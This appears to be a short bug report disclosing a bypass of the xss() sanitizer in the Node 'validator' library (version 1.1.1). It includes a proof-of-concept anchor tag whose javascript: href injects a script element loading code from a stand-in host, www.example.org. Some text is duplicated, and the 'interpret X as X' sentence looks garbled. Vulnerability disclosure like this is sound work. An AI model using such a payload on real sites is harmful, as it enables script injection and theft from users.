xss() removes string "javascript" in attributes; however, this is insufficient since browsers interpret <a href="javascript:...">abc</a> as <a href="javascript:...">abc</a>.
Example
var validator = require('validator');
console.log(validator.sanitize("<a href=\"javascript:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')\">abc</a>").xss());
Expected
Actual (version 1.1.1)
<a href="javascript:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')">abc</a>
xss() removes string "javascript" in attributes; however, this is insufficient since browsers interpret
<a href="javascript:...">abc</a>as<a href="javascript:...">abc</a>.Example
Expected
Actual (version 1.1.1)